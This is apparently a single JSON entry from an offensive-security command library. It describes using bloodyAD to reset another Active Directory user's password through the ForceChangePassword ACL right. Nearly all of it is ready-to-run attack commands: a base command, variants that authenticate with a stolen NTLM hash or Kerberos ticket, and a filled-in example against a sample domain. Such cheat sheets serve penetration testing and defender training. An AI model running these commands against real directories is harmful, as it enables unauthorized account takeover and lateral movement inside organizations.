{
  "id": "bloodyad-set-password",
  "name": "bloodyAD Set Password",
  "command": "bloodyAD --host <dc-ip> -d <domain> -u <user> -p <password> set password <target_user> <new_password>",
  "description": "Reset another user's password if you have ForceChangePassword (User-Force-Change-Password extended right) on them. Bread-and-butter ACL-abuse path — typically gained via BloodHound paths.",
  "platform": "linux",
  "requires": ["password"],
  "protocols": ["ldap"],
  "tags": ["bloodyad", "password-reset", "acl-abuse", "force-change-password"],
  "variations": [
    { "label": "NTLM Hash", "requires": "hash", "command": "bloodyAD --host <dc-ip> -d <domain> -u <user> -p :<hash> set password <target_user> <new_password>" },
    { "label": "Kerberos Ticket", "requires": "ticket", "command": "KRB5CCNAME=<ccache> bloodyAD --host <dc-fqdn> -d <domain> -u <user> -k set password <target_user> <new_password>" }
  ],
  "references": [
    { "title": "bloodyAD docs", "url": "https://github.com/CravateRouge/bloodyAD/wiki" },
    { "title": "The Hacker Recipes — ForceChangePassword", "url": "https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword" }
  ],
  "examples": [
    "bloodyAD --host 10.10.10.10 -d corp.local -u jdoe -p 'Password123!' set password svc_sql 'NewP@ssw0rd!'"
  ]
}
